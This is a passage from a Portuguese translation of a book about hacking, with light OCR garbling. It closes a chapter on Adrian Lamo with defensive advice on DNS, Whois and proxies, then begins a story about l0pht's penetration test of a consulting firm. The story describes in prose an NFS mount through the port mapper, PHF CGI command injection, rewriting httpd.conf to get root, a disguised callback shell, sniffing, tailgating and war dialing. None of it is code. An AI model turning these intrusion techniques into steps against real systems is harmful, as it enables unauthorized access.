de um modo diferente, me possibilitam entrar por tangentes, mas de um modo que respeita as 
leis. 

Adrian tambem conseguiu fazer ffee lance para a NetWork World. Eles tinham entrado em conta-to com 
ele, ąueriam usa-lo como fonte para uma historia. Adrian vendeu-lhes a ideia de que, em vez de fazer uma 
entrevista com ele para complementar o artigo, eles o deixassem escrever uma parte do artigo. O editor da 
revista concordou. Entao, acompanhando um texto que descrevia hackers havia um texto escrito por ele que 
descrevia administradoras de rede. 

O Jornalismo e o que eu quero fazer. Sinto que posso fazer diferenęa, e nao se ganha 
muito trabalhando em seguranęa. Seguranęa e um setor que conta muito com os medos e 
as incertezas das pessoas no que diz respeito a computadores e tecnologia. Jornalismo 
fala muito mais sobre a yerdade. 
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Hacking e uma ąuestao unica de ego. Envolve o potencial de um unico indmduo ter enorme 

poder nas maos, poder este reservado ao governo ou a grandes empresas. A ideia de um 

adolescente ser capaz de provocar uma pane de energia assusta o governo. Pelo menos deveria. 

Ele nao se considera um hacker, cracker ou invasor da rede. "Cito Bob Dylan: 'Nao sou prega-dor nem 
caixeiro-viajante. Só faęo o que faęo'. Fico feliz ąuando as pessoas entendem ou ąuerem entender isso," 

Adrian diz que lhe ofereceram empregos lucrativos em agencias militares e no govemo federal. Ele os 
recusou. "Muita gente adora sexo, mas nem todos querem fazer disso um meio de sobrevivencia." 

Este e Adrian, o purista... o hacker que pensa no homem. 

Insight 

Ao pensar na atitude e nas aęoes de Adrian Lamo, acho que voce concordara comigo com relaęao a 
maneira como os promotores federais calcularam o custo dos 'danos' que ele causou. 

Graęas a minha experiencia pessoal, sei como os promotores aumentam o preęo suposto em casos de 
hacker. Uma estrategia e obter declaraęoes de empresas que superestimam suas perdas na esperanęa de que o 
hacker seja declarado infrator em vez de ir a julgamento. O advogado de defesa e o promotor, entao, chegam 
a um acordo quanto a uma soma menor, como a perda que sera apresentada ao juiz; sob as diretrizes federais, 
quanto maior for a perda, mais longa sera a sentenęa. 

No caso de Adrian, o U. S. Attomey preferiu ignorar o fato de que as empresas tinham conhecimento de 
que eram vulneraveis a ataques — porque o próprio Adrian lhes contou isso. Todas as vezes, ele protegeu as 
empresas avisando-as sobre furos em seus sistemas e esperando ate que os problemas fossem corrigidos antes 
que noticias sobre a invasao fossem dmilgadas. Sem duvida, ele tinha yiolado a lei, mas agiu eticamente 
(pelo menos em meu livro). 

Medidas preventivas 

A abordagem usada por atacantes, e tambem por Adrian, de realizar hwestigaęao Whois pode re-velar 
inumeras informaęoes valiosas, disponiveis nos quatro centros de informaęao de rede (NICs), que cobrem 
diferentes informaęoes geograficas do mundo. A maior parte das informaęoes, nesses bancos de dados, e 
publica, disponivel a qualquer um que use um utilitario Whois entre em um site Web que ofereęa o servięo e 
entre com um nome de dominio, como nytimes.com. 

As informaęoes fomecidas podem incluir o nome, o e-mail, o endereęo e o numero de tele-fone dos 
contatos tecnico e administrativo para o dominio. Essa informaęao poderia ser usada para ataques de 
engenharia social, como discutiremos no Capitulo 10. Alem disso, pode dar uma pista sobre o padrao para 
endereęos de e-mail e nomes login usados pela empresa. Por exemplo, se um endereęo de e-mail aparecesse 
como, digamos, hilda@nytimes.com, isso poderia sugerir a possibilidade de que nao só esse funcionario, mas 
talvez inumeros integrantes da equipe do Times poderiam estar usando só o primeiro nome para endereęo de 
e-mail e possivelmente tambem para acessar. 
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Como foi explicado na historia do ataąue de Adrian ao New York Ttmes, ele tambem recebeu informaęoes 
valiosas sobre os endereęos de IP e netblocks atribuidos a empresa jomalistica, os ąuais foram fundamentais para o 
sucesso de seu ataąue. 

Para limitar o vazamento de informaęoes, urna medida sensata para ąualąuer empresa seria listar numeros de 
telefone somente para a mesa de telefonia, em vez de individuos especificos. As telefonistas passariam por 
treinamento intensivo para reconhecer rapidamente ąuando alguem tentasse obter informaęoes delas. Alem disso, o 
endereęo de correio listado deveria ser o endereęo publicado da sede corporativa, e nao o de instalaęoes particulares. 

Melhor ainda: as empresas teriam permissao para manter em segredo informaęoes de contato de nome de 
dominio — elas nao precisariam mais ser listadas como informaęoes disponiveis a ąualąuer um ąue as reąuisitasse. 
Se solicitada, a listagem da empresa poderia ser 'obscurecida', o que tomaria essa abordagem mais dificil para os 
atacantes. 

Outra dica valiosa foi mencionada na historia: instalar um DNS split-horizon. Isso implica estabelecer um 
servidor DNS interno para resolver nomes de hosts na rede interna enąuanto se instala outro servidor DNS extemo 
com os registros para hosts que sao usados pelo publico. 

Em outro metodo de reconhecimento, um hacker vai investigar os DNSs de peso para saber qual e o ripo e a 
plataforma do sistema operacional de computadores corporativos e buscar informaęoes 
para mapear todo o dominio do alvo. Essas informaęoes sao muito uteis ao coordenar mais um ataąue. 

O banco de dados DNS pode incluir registros Host Information (Hinfo) que vazem essa informaęao. Os 
administradores de rede deveriam evitar deixar registros Hinfo em ąualąuer servidor DNS de acesso ao publico em 
geral. 

Outro truąue de hacker faz uso de urna operaęao chamada transferencia de zona. (Embora nao tenha obtido 
sucesso, Adrian diz que tentou esse metodo em seus ataąues tanto ao New York Times ąuanto a Excite@Home.) Para 
proteęao de dados, um servidor DNS primario geralmente e configurado para permitir que outros servidores com 
autoridade copiem registros DNS para um dominio particular. Se o servidor primario nao tiver sido configurado 
adeąuadamente, um atacante podera iniciar urna transferencia de zona a ąualąuer computador que determinar e desse 
modo obter prontamente informaęoes detalhadas sobre todos os hosts nomeados e seus endereęos IP associados do 
dominio. 

O procedimento para se proteger contra esse ripo de ataąue implica permitir transferencias de zona apenas entre 
sistemas confiaveis, conforme o necessario, para operaęoes comerciais. Para ser mais especifico, o servidor primario 
DNS deveria ser configurado de modo a permitir transferencias somente a seu servidor DNS secundario confiavel. 

Alem disso, urna regra-padrao de firewall deveria ser usada para bloąuear acesso a TCP porta 53 em ąualąuer 
servidor de nome da empresa. E outra regra de firewall pode ser definida para permitir a serve-dores de nomes 
secundarios confiaveis conectar-se a TCP porta 53 e iniciar transferencias de zona. 

As empresas deveriam dificultar a um atacante o uso da tecnica reverse lookup no sistema de dominio do DNS. 
Embora seja conveniente usar nomes de host que deixem claro para que finalidade o host esta sendo usado — nomes 
como database.Com panyX.com —, e óbvio que isso tambem facilita a um invasor identificar sistemas que seriam um 
bom alvo. 

Outras tecnicas de reunir informaęoes sobre reverse lookup do DNS incluem dicionario e ataąues yiolentos. Por 
exemplo, se o dominio-alvo for kevinmitnick.com , um ataąue com base no 
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dicionario mostrara o prefixo de toda palavra no dicionario com nome de dominio na Forma de 
dictionaryword.keyinmitnick.com para identificar outros hosts dentro daąuele dominio. Um ataąue reverso DNS 
violento e muito mais complexo, e nele o prefixo e urna serie de caracteres alfanumericos que adiciona um caractere 
por vez para passar pelas possibilidades. Para bloąuear esse metodo, o servidor DNS da corporaęao pode ser 
configurado de modo a eliminar a publicaęao de registros DNS de quaisquer nomes de host intemos. E, alem de um 
servidor interno, um servidor DNS extemo pode ser usado, de modo que hostnames intemos nao vazem para qualquer 
rede nao-confiavel. Alem disso, o uso de servidores de nomes separados, intemos e extemos, tambem ajuda na 
questao mencionada anteriormente a respeito dos nomes de host: um servidor DNS interno, protegido de ser visto de 
fora do firewall, pode usar nomes de host, identificando-os como bancos de dados, pesąuisa e backup com pouco 
risco. 

Adrian conseguiu obter informaęoes valiosas sobre a rede do New York Times examinando o cabeęalho de um e- 
mail recebido do jomal, o que revelou um endereęo IP interno. Os hackers mandam intencionalmente e-mails que 
serao devolvidos para obter esse tipo de informaęao ou vasculham newsgroups publicos procurando mensagens de e- 
mail que sejam igualmente reveladoras. A informaęao do cabeęalho pode pór a descoberto muita coisa, inclusive 
convenęoes de nomes usadas intemamente, endereęos IP intemos e o caminho que urna mensagem de e-mail fez. Para 
se protegerem contra isso, as empresas deveriam configurar seu servidor SMTP (Simple Mail Transfer Protocol) para 
filtrar qualquer endereęo IP interno ou informaęoes de host de mensagens que sejam enviadas, evitando que os 
identificadores intemos sejam expostos ao publico. 

A arma basica de Adrian foi seu dom intelectual de encontrar servidores proxy mai configurados. Lembre-se de 
que a funęao de um servidor proxy e permitir que os usuarios no lado confiavel da rede de computador acessem 
recursos da Internet no lado nao-confiavel. O usuario do lado de dentro faz urna solicitaęao para determinada pagina 
Web; a solicitaęao e encaminhada ao servidor proxy, que a envia em nome do usuario e devolve a resposta para ele. 

Para impedir que os hackers obtenham informaęoes do modo como Adrian age, os servidores proxy deveriam ser 
configurados para atender somente a interface interna. Ou, em vez disso, podem ser configurados para atender 
somente urna lista autorizada de endereęos IP extemos confiaveis. Assim, nenhum usuario extemo nao autorizado 
pode se conectar. Um erro comum e estabelecer servidores proxy que atendam a todas as interfaces da rede, inclusive 
a interface extema conectada a Internet. Em vez disso, o servidor proxy deveria ser configurado de modo a dar 
permissao somente a um conjunto especial de endereęos de IP que foram deixados de lado pela Internet Assigned 
Numbers Authority (lana) para redes privadas. Ha tres blocos de endereęos IP privados: 

10.0.0.0 ate 10.255.255.255 

172.16.0.0 ate 172.31.255.255 
192.168.0.0 ate 192.168.255.255 

Tambem e urna boa ideia usar a restrięao a portas para servięos especificos que o servidor proxy tera, como 
limitar qualquer conexao para fora ao HTTP (acesso a Web) ou ao HTTPS (acesso seguro a Web). Para maior 
controle, alguns servidores proxy que usam SSL (Secure Sockets Layer) podem ser configurados para examinar os 
estagios iniciais do que esta sendo enviado, para certificar- 
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se de que um protocolo nao autorizado nao esteja sendo enviado por uma porta autorizada. Essas medidas evitarao 
que o atacante use o servidor proxy para se conectar a servięos nao autorizados. 

Depois de instalar e configurar um servidor proxy, ele deve ser testado quanto a vulnerabilidades. Voce nunca 
sabe se ele e vulneravel ate testar falhas na seguranęa. Um verificador gratuito de proxy pode ser transferido por 
download da Intemet.(5) 

Outra coisa: um usuario que esteja instalando um pacote de software pode, em algumas circunstancias, sem 
saber, estar instalando software de servidor proxy. Praticas corporativas de seguranęa deveriam fomecer 
procedimentos para verificaęao rotineira de computadores para servidores proxy nao autorizados que possam ter sido 
instalados inadvertidamente. Voce pode usar a ferramenta favorita de Adrian, Proxy Hunter, para testar sua própria 
rede. Lembre-se de que um servidor proxy mai configurado pode ser o melhor amigo de um hacker. 

Muitos ataques de hackers podem ser bloqueados simplesmente se as melhores praticas de seguranęa forem 
adotadas e se os devidos cuidados forem tomados. Mas os perigos de usar acidental* mente um proxy aberto sao, de 
modo geral, ignorados e representam uma importante vulnerabilidade em um grandę numero de organizaęoes. Dito o 
suficiente? 

O resultado 

Em qualquer area, as pessoas que pensam de modo original, que vao fundo em suas reflexoes e veem o mundo 
(ou pelo menos partes dele) de um modo mais claro que aquelas que estao ao redor delas sao pessoas que vale a pena 
incentivar. 

E, para aqueles como Adrian Lamo, as pessoas valorizam a caminhada por um caminho construtivo. Adrian tern 
a capacidade de fazer contribuięoes significativas. Eu acompanharei o progresso dele fascinado. 

Notas 

1. Veja o press release do governo dos Estados Unidos em www.usdoi.qov/criminal/cvbercrime/lamoCharqe. htm. 

2. Ver www.usdoi.gov/criminal/cybercrime/lamoCharge.htrn . 

3. Para mais informaęoes, ver www.crime-research.orq/librarv/Kevin2.htm . 

4. Ver http://www.infoworld.com/article/04/07/16/HNIamohome l.html . 

5. Para mais informaęoes sobre o assunto, ver www.corpit.ru/mjt/proxycheck.html. 
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A sabedoria e a loucura 
dos pen tests 


O ditado de que os sistemas de seguranęa tem de vencer sempre e o atacante só 
tem de vencer uma vez e verdadeiro. 

Dustin Dykes 


Pense numa autoridade de um presidio que contrata um especialista para estudar os procedimentos de 
seguranęa de sua instituięao, preocupada com qualquer falha que possa permitir a fuga de um detento. Uma 
empresa segue essa mesma linha de pensamento quando contrata uma empresa de seguranęa para testar a 
inviolabilidade de seu site Web e de sua rede de computadores, observando se os atacantes* contratados sao 
capazes de descobrir uma maneira de acessar dados confidenciais, entrar em areas de acesso restrito ao 
escritório ou encontrar falhas na seguranęa que poderiam pór a empresa em risco. 

Para pessoas da area de seguranęa, esses sao os chamados testes de penetraęao — ou, no jargao, 'pen 
tests'. Os funcionarios das empresas de seguranęa que conduzem esses testes freqiientemente sao ex-hackers 
(surpresa!). Na verdade, os fundadores dessas empresas sao pessoas que tem extensa experiencia como 
hackers e preferem que seus clientes nunca saibam disso. Faz sentido esses profissionais virem da 
comunidade de hackers, ja que um hacker tipico aprende atraves de endereęos de portas comuns, mas nao tao 
comuns, que as empresas deixam inadvertidamente abertas, dando acesso a seus santuarios intemos. Muitos 
desses ex-hackers sabem, desde a adolescencia, que 'seguranęa' e, na maioria dos casos, uma denominaęao 
atribuida incorretamente, e isso e serio. 

Qualquer empresa que solicite um pen test e nutra a expectativa de que os resultados confirmem que sua 
seguranęa esta intacta e impecavel provavelmente vai se decepcionar. Os profissionais que conduzem 
avaliaęóes de seguranęa frequentemente encontram os mesmos yelhos erros — as empresas 
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simplesmente nao estao tomando providencias suficientes para proteger suas informaęoes e seus sistemas de 
computaęao. 

As organizaęoes e agencias govemamentais realizam essas avaliaęoes com a finalidade de identificar o grau de 
seguranęa a qualquer momento. Alem disso, elas poderiam medir seu progresso depois de corrigir qualquer 
yulnerabilidade identificada. Naturalmente, um pen test e analogo a um eletrocardiograma. No dia seguinte a sua 
aplicaęao, um hacker pode invadir usando um ataque 'dia-zero' (zero-day)', embora a empresa ou agencia tenha 
passado pela avaliaęao de seguranęa de modo brilhante. 

Entao* pedir um pen test na expectativa de que ele confirme que a organizaęao esta fazendo um trabalho 
excepcional para proteger suas informaęoes confidenciais e loucura. Talvez os resultados provem exatamente o 
contrario, como demonstrado nas histórias a seguir — urna sobre urna empresa de consultoria e outra sobre urna 
empresa de biotecnologia. 

Um inverno gelado 

Nao faz muito tempo, varios gerentes e executivos de urna grandę empresa de consultoria de TI de New England 
reuniram-se na sala de conferencia para urna reuniao com dois consultores. Posso imaginar que o pessoal da empresa 
de tecnologia deve ter sentido curiosidade sobre um dos consultores, Pieter Zatko, um ex-hacker muito conhecido 
como 'Mudge'. 

No inicio da decada de 1990, Mudge e um amigo juntaram-se a um grupo de colegas que pensavam do mesmo 
modo para trabalhar num local desconfortavel — um depósito em Boston; o grupo se tomaria urna equipe bastante 
respeitada na area de seguranęa de computadores, chamada lOpht ou lOpht Heavy Industries. A medida que a 
iniciativa se tomou bem-sucedida e sua reputaęao se espalhou, Mudge foi convidado a divulgar seu conhecimento. 
Ele deu palestras em lugares como a escola de estrategia do Exercito dos Estados Unidos, em Monterey, sobre 'guerra 
de informaęao' - como entrar em computadores de um inimigo e destruir servięos sem ser detectado — e tambem 
sobre tecnicas de destruięao de dados e outros temas. 

Urna das ferramentas mais conhecidas entre hackers de computador (e as vezes entre o pessoal da seguranęa 
tambem) e o pacote de software chamado lOphtCrack. A magica que esse programa realiza e apreciada por seus 
usuarios, e suspeito que seja totalmente odiada pela maioria das outras pessoas. O grupo lOpht atraiu a atenęao da 
midia porque escreveu urna ferramenta (chamada lOphtCrack) que violava rapidamente hashes de senha. Mudge foi 
co-autor do lOphtCrack e co-fimdador do site on-line que tomou o programa disponivel a hackers e a qualquer 
interessado — primeiramente gratuito e, mais tarde, urna operaęao para ganhar dinheiro. 

Reuniao inicial 

O chamado que a lOpht tinha recebido da empresa de consultoria (que chamaremos Newton') veio depois que ela 
decidiu expandir os servięos que oferecia a seus clientes, acrescentando a conduęao de pen tests. Em vez de contratar 
novos funcionarios e montar um departamento, eles estavam 


Explorar vulnerabilidades quase simultaneamente após a sua descoberta (N. da R. T.). 
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sondando uma organizaęao que ja existia e que pudessem comprar e levar para casa- No inicio da reuniao, 
um funcionario da empresa pós a ideia as claras: "Queremos comprar voces e toma-los parte de nossa 
empresa". Mudge se lembra da reaęao: 

Ficamos meio em duvida e dissemos algo como: "Bem, ah, hum, voces nem nos conhecem 
muito bem". Sabfamos que eles estavam realmente interessados, em grandę parte devido ao 
alarde feito pela midia do que o lOphtCrack estava causando. 

Em parte para ganhar tempo enquanto se acostumava com a ideia de vender a empresa, em parte porque 
nao queria se apressar em fazer negociaęoes, Mudge usou uma tatica para adiar a decisao, 

Eu disse: "Vejam, voces nao sabem realmente o que estao comprando. Que tal fazermos o 
seguinte: por 15 mil dólares fazemos um pen test completo em sua organizaęao?" Na epoca, a 
lOpht nem era uma empresa que aplicava pen test, Mas eu disse a eles: "Voces nao conhecem 
nossas habilidades, estao se deixando levar pela publicidade. Voces nos pagam 15 mil dólares, 

Se nao gostarem do resultado, entao nao precisam nos comprar, e ainda assim esse tera sido um 
bom negócio, porque voces terao um bom relatório de pen test e nos teremos 15 mil dólares no 
banco. E, e claro, se voce gostarem e ficarem impressionados com ele — e esperamos que 
fiquem —, entao nos comprarao". 

Eles responderam: "Sem duvida, e uma excelente ideia". E eu 
pensei: "Que idiotas!". 

Para Mudge, eles eram "idiotas" porque iam autorizar a equipe lOpht a entrar em seus arquivos e 
correspondencias, ao mesmo tempo que estavam negociando um acordo de compra de sua empresa. Ele 
esperava conseguir dar uma boa espiada debaixo do nariz deles. 

Regras basicas 

Os consultores de seguranęa que fazem pen tests as vezes tern algo em comum com os tiras que compram 
drogas para descobrir traficantes. Se algum tira uniformizado do distrito flagra uma transaęao e saca a arma, 
o cara da divisao de narcóticos mostra suas credenciais de policial. Sem preocupaęao de ir para a prisao. O 
consultor de seguranęa contratado para testar as defesas de uma empresa quer ter a mesma proteęao. Em vez 
de um cracha, cada membro da equipe de pen test recebe uma carta assinada por um executivo da empresa 
declarando, de foto: "Este sujeito foi contratado para desenvolver um projeto para nos, e se voces o pegarem 
fazendo algo que pareęa impróprio, nao se preocupem. Nada de pressao. Deixem-no fazer seu trabalho e 
enviem-me uma mensagem com os detalhes". 

Na comunidade de seguranęa, essa carta e conhecida por todos como o "cartao de 'passe livre' do 
presidio". Aqueles que fazem pen tests costumam levar sempre consigo uma cópia dessa carta quando estao 
na empresa-cliente ou próximos dela, para o caso de serem parados por um seguranęa que decida flexionar 
alguns musculos e impressionar figuróes com seus instintos de detetiye ou para 
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o caso de serem ąuestionados por um funcionario consciente de que ha alguma coisa suspeita e tem coragem 
suficiente para confrontar aąuele que esta realizando o pen test. 

Outra medida-padrao estabelecida antes de se iniciar um teste e ouvir as regras basicas especificadas pelo cliente 
— que partes da operaęao ele quer que sejam incluidas no teste e que partes devem ficar de fora. Esse e apenas um 
ataque tecnico para verificar se os analistas conseguem obter informaęoes confidenciais encontrando sistemas sem 
proteęao ou passando pelo firewali? E apenas urna avaliaęao do site Web disponlvel ao publico, da rede interna de 
computadores ou do trabalho todo? Os ataques de engenharia social serao incluidos — tentar persuadir funcionarios 
a dar informaęoes nao autorizadas? E os ataques ao mundo real, em que os analistas do teste tentam se infiltrar no 
edificio, driblando a foręa policial ou passando 'de fininho' pela entrada exclusiva de funcionarios? E o que dizer de 
'virar latas' para tentar obter informaęoes — revirar o lixo da empresa para encontrar papeis jogados fora com senhas 
ou outros dados de valor? Tudo isso precisa ser esclarecido com antecedencia. 

Freqiientemente, a empresa quer somente um teste restrito. Elm membro do grupo lOpht, Carlos, acha que isso e 
irreal e ressalta que "os hackers nao trabalham desse jeito". Ele e a favor de urna abordagem mais agressiva, na qual 
"se coloca a mao na massa" e nao ha restrięoes. Esse tipo de teste nao só e mais revelador e valioso para o cliente, 
como tambem mais agradavel para quem o realiza. Para Carlos, e "muito mais divertido e interessante". Dessa vez, 
ele conseguiu o que desejava: a Newton concordou com um ataque sem restrięoes. 

A seguranęa baseia-se fundamentalmente na confianęa. A empresa contratante deve confiar na empresa 
encarregada de desempenhar a avaliaęao de seguranęa. Alem disso, a maior parte das empresas e agencias do govemo 
exige um acordo de sigilo (NDA) para proteger legalmente informaęoes de sua propriedade de revelaęoes nao 
autorizadas. 

E comum aqueles que fazem pen tests assinarem um NDA, urna vez que podem chegar a informaęoes 
confidenciais. (E claro que o NDA parece quase superfluo: urna empresa que tenha feito uso de qualquer informaęao 
de cliente provavelmente nunca conseguira outros clientes. A discrięao e um pre-requisito essencial.) 
Frequentemente, os realizadores de pen tests tambem precisam assinar urna declaraęao adicional dizendo que a 
empresa fara o melhor para nao causar impacto nas operaęoes diarias de negócios da empresa—cliente. 

O grupo da lOpht que faria o teste da Newton seria formado por sete indmduos, que trabalha-riam isoladamente 
ou em duplas, e cada pessoa ou equipe seria responsavel por focalizar um aspecto diferente das operaęoes da 
empresa. 

Ataąue! 

Com seus cartoes de garantia de 'passe livre' da prisao, os membros da equipe lOpht poderiam ser tao ofensivos 
quanto quisessem, ate mesmo 'barulhentos' — o que significa realizar atividades que poderiam chamar a atenęao para 
si mesmos, urna coisa que urna pessoa que faz pen test geralmente evita. Mas eles ainda esperavam manter-se 
invisiveis, "E mais legał conseguir roda essa informaęao e entao no finał descobrir que nao foi detectado. Voce esta 
sempre tentando isso", diz Carlos. 

O servidor Web da Newton estava executando o software servidor popular chamado Apache. A primeira 
vulnerabilidade que Mudge detectou foi que o Checkpoint Firewall-1 da emprcesa-alvo tinha 
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uma configuraęao-padrao oculta (regra) para permitir a entrada de pacotes com uma fonte UDP (User Data Protocol) 
ou uma porta de 53 TCP (Transmission Control Protocol) para ąuase todas as portas alias acima de 1023. A primeira 
coisa em que pensou foi tentar desmontar os sistemas de arquivo ex-portados deles usando o NFS (Network File 
System — Sistema de Arquivos de Rede), mas percebeu logo que o firewall tinha uma ordem para bloquear o acesso 
ao NFS automatico (porta 2049). 

Embora os servięos comuns de sistema fossem bloqueados, Mudge sabia de um recurso nao documentado do 
sistema operacional Solaris que ligava o rpcbind (o mapeador de porta) a uma porta acima de 32770. O mapeador de 
porta atribui numeros de porta dinamica para certos programas. Desse modo, ele conseguiu encontrar a porta 
dinamica que foi atribuida ao servięo mount automatico (mountd). Dependendo do formato da solicitaęao, diz 
Mudge, "o mount automatico tambem capta solicitaęoes do Network File System porque usa o mesmo código. 
Peguei o mount automatico do mapeador de porta, fui ao mount automatico e fiz minha solicitaęao NFS". Usando um 
programa chamado nfsshell, ele conseguiu montar remotamente o sistema de arquivo do sistema-alvo. Mudge conta: 
"Rapidamente conseguimos os numeros dial-up da lista. Fizemos o download de todos os seus sistemas de arquivos 
exportados. Tinhamos controle total do sistema". 

Mudge tambem descobriu que o servidor-alvo era vulneravel a brecha no PHF ubique (ver Capitulo 2). Ele 
conseguiu enganar o script PHF CGI para que este executasse comandos arbitrarios passando a serie Unicode para um 
caractere newline seguido pelo comando shell para executar. Ao examinar o sistema usando PHF, ele percebeu que o 
processo do servidor Apache estava funcionando sob a conta 'nobody'. Mudge ficou satisfeito ao ver que os 
administradores de sistemas tinham 'trancado a caixa — ou seja, garantido a seguranęa do sistema de computador —, 
que e exatamente o que deveria ser feito caso o servidor fosse conectado a uma rede nao-confiavel como a Internet. 
Ele buscou arquivos e diretórios, esperando encontrar um que pudesse ser reescrito. Ao fazer outro exame, notou que 
o arquivo de configuraęao Apache (httpd.conf) tambem era da conta 'nobody'. Esse erro significava que ele poderia 
reescrever o conteudo do arquivo httpd.conf. 

A estrategia de Mudge foi mudar O arquivo de configuraęao Apache de modo que, da próxima vez que fosse 
reinicializado, o servidor funcionasse com os privilegios da conta root. Mas ele precisava achar um modo de editar a 
configuraęao para que pudesse mudar o usuario Apache que iria executar. 

Trabalhando com um homem cujo codinome e Hobbit, os dois imaginaram um modo de usar o programa netcat, 
junto com alguns truques shell, para obter algo que seria mais próximo de um shell interativo. Uma vez que o 
administrador de sistema aparentemente tinha mudado a propriedade dos arquivos no diretório 'conf para 'nobody', 
Mudge conseguiu usar o comando 'sed' para editar httpd.conf, de modo que, da próxima vez que o Apache fosse 
inicializado, ele seria executado como root, (Essa vulnerabilidade na versao corrente do Apache foi corrigida a partir 
de entao.) 

Uma vez que as mudanęas dele nao teriam efeito ate que o próximo Apache fosse reinicializado, ele teve de 
sentar e esperar. Depois que o servidor foi reiniciado, Mudge conseguiu executar comandos como o root por meio da 
mesma vulnerabilidade PHF. Enquanto aqueles comandos tinham sido executados previamente sob o contexto da 
conta 'nobody', agora o Apache estava sendo executado como root. Com a capacidade de executar comandos como 
root, foi facil ganhar pleno controle do sistema. 

Enquanto isso, os ataques lOpht estavam progredindo em outras frentes. Mudge tern um termo mais formal para o 
que a maioria de nos, em hacking e seguranęa, chama de virar latas: analise fisica. 
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Enviamos pessoas para fazer analise flsica. Acho que um funcionario [da empresa 
cliente] tinha sido demitido ha poiico tempo, e em vez de simplesmente se desfazerem 
de seus papeis, eles se desfizeram da mesa toda. [Nossos caras descobriram] A mesa 
e todo o lixo. As gavetas estavam cheias de passagens aereas antigas, manuais e os 
mais diversos tipos de documentos internos. 

Eu ąueria mostrar [ao cliente] que boas praticas de seguranęa nao se restringem 
apenas a seguranęa de computadores. 

Isso foi muito mais facil do que revirar todo o lixo, porque eles tinham um compactor. 

Mas nao podiam passar a mesa pelo compactor. 

Ainda tenho a mesa guardada em algum lugar. 

A equipe de ataque fisico tambem entrou nas instalaęoes da empresa usando um metodo simples e, nas 
condięoes certas, infalfvel, conhecido como tailgating (pegar a rabeira). Isso implica seguir de perto um funcionario 
enquanto ele passa por urna porta de seguranęa e funciona especialmente bem quando alguem sai do refeitório de 
urna empresa ou de outra area mais utilizada pelos funcionarios para ir a urna area segura. A maioria dos 
funcionarios, particularmente aqueles que ocupam funęoes mais simples, hesita em confrontar um estranho que 
entra no edificio logo atras deles, temendo que possa ser alguem do escalao superior da empresa. 

Outra equipe lOpht estava conduzindo ataques aos sistemas de voicemail e telefonia da empresa. O ponto de 
partida e descobrir o fabricante e o tipo de sistema que o cliente esta usando e depois preparar um computador 
para war dialing — ou seja, tentar urna extensao após outra para localizar funcionarios que nunca tiveram senhas 
próprias ou usaram senhas faceis de adivinhar. Urna vez encontrado um telefone vulneravel, os atacantes podem, 
entao, ouvir qualquer mensagem gravada de voicemail. (Os hackers de telefonia — 'phreakers' — tern usado o 
mesmo metodo para incluir chamadas externas na conta da empresa.) 

Enquanto fazia o war dial, a equipe de telefonia lOpht tambem estava identificando as extensóes de telefone 
da empresa respondidas por um modem dial-up. Essas conexoes dial-up as vezes nao tern proteęao, contando 
com a abordagem da 'seguranęa pela obscuridade', e estao frequentemente 'no lado confiavel' do firewall. 

Blackout 

Os dias estavam passando, as equipes estavam gravando informaęoes valiosas, mas Mudge ainda nao tinha 
tido urna ideia brilhante sobre como reinicializar o sistema Apache para que pudesse obter acesso a rede. Entao, 
ocorreu um incidente que, para a equipe, foi um beneficio: 

Eu estava ouvindo as noticias ąuando informaram sobre um blackout na cidade onde a 
empresa estava localizada. 

Aąuilo foi realmente tragico, porąue um trabalhador da empresa de seryięos publicos tinha 
morrido em uma explosao numa rede de eletricidade do outro lado da cidade, e toda a cidade 
ficou sem energia. 
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Eu pensei: "Se levar tempo suficiente para voltar a energia, entao o sistema de backup do 

seryidor muito provavelmente sera desligado". 

Aąuilo significaya que o seryidor iria desligar. Quando a energia yoltasse, o sistema faria uma 
reinicializaęao. 

Sentei la, verificando o seryidor Web constantemente, e entao, em algum momento, o sistema caiu. 

Eles tiveram de reinicializar, Aąuilo aconteceu na hora certa para nos. Quando o sistema voltou, la 

estava o Apache sendo executado como root, conforme planejamos. 

A eąuipe lOpht naąuele momento conseguiu comprometer completamente a maąuina, a qual se tomou 
"nosso ponto de apoio interno para escanearmos um ataąue a partir dali". Para Carlos, isso era uma festa. 

A eąuipe desenvolveu uma parte do código que faria com que se tomasse improvavel que eles fossem 
impedidos de entrar no sistema. Firewalls corporativos geralmente nao sao configurados para bloąuear o 
trafego de saida, e o programa 'peso leve' de Mudge, instalado no seryidor da Newton, fazia conexao de 
minuto em minuto de volta a um computador sob o controle da eąuipe, Essa conexao fomecia uma interface 
de linha de comando, como o 'shell de linha de comando'. familiar aos usuarios do Unix, Linux e do velho 
sistema operacional DOS. Em outras palavras, a maąuina da Newton estava permitindo regularmente a 
eąuipe de Mudge a oportunidade de entrar com comandos que contomavam o firewall da empresa. 

Para evitar ser detectado, Mudge tinha dado nome a seu script de modo a misturar-se a linguagem basica 
do sistema. Qualquer um que identificasse o arquivo imaginaria que ele fazia parte do ambiente normal de 
trabalho. 

Carlos comeęou a procurar os bancos de dados Oracle na esperanęa de encontrar dados da folha de 
pagamento dos funcionarios. "Se voce pode mostrar ao diretor fmanceiro o salario dele e ąuanto recebeu de 
bonus, isso geralmente da a entender que voce conseguiu tudo." Mudge instalou um sniffer (farejador*) em 
todo e-mail que entrava e saia da empresa. Sempre que um funcionario da Newton fosse ao firewall para o 
trabalho de manutenęao, a lOpht saberia disso. Eles ficaram espantados ao ver que um texto simples era 
utilizado para entrar no firewall, 

Em pouco tempo, o lOpht tinha penetrado na rede toda e tinha os dados para provar isso. Diz Mudge: 
"Voce sabe, e por isso que eu penso que muitas empresas nao gostam de ter pen tests dentro de suas redes. 
Elas sabem que isso e ruim". 

Revelaęoes de voicemail 

A eąuipe de telefonia descobriu que alguns dos executivos que estayam conduzindo as negociaęoes 
para adąuirir o lOpht tinham senhas-padrao em suas caixas de yoicemail. Mudge e seus colegas de 
eąuipe ouyiram mensagens — algumas delas engraęadas. 


Programa que tern a capacidade de capturar todo o trafego de rede que passa por ele (N. da R. T.). 
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Um dos itens que eles tinham solicitado como condięao de venda da lOpht para a empresa era uma 
unidade móvel de operaęoes — uma van que eles pudessem equipar com aparelhos sem fio e usar durante 
outros pen tests para captar comunicaęoes sem fio nao-criptografadas. Para um dos executivos, a ideia de 
comprar uma van para a equipe lOpht parecia um absurdo tao grandę que ele comeęou a chama-la de motor 
home. O voicemail dele estava cheio de comentarios bastante criticos sobre a equipe, de modo geral, Mudge 
se divertiu e ficou chocado ao mesmo tempo- 

Relatório finał 

Quando o periodo de teste terminou, Mudge e a equipe escreveram seu relatório e prepararam-se para 
entrega-lo numa reuniao que contaria com a presenęa de todos os executivos da Newton. O pessoal da 
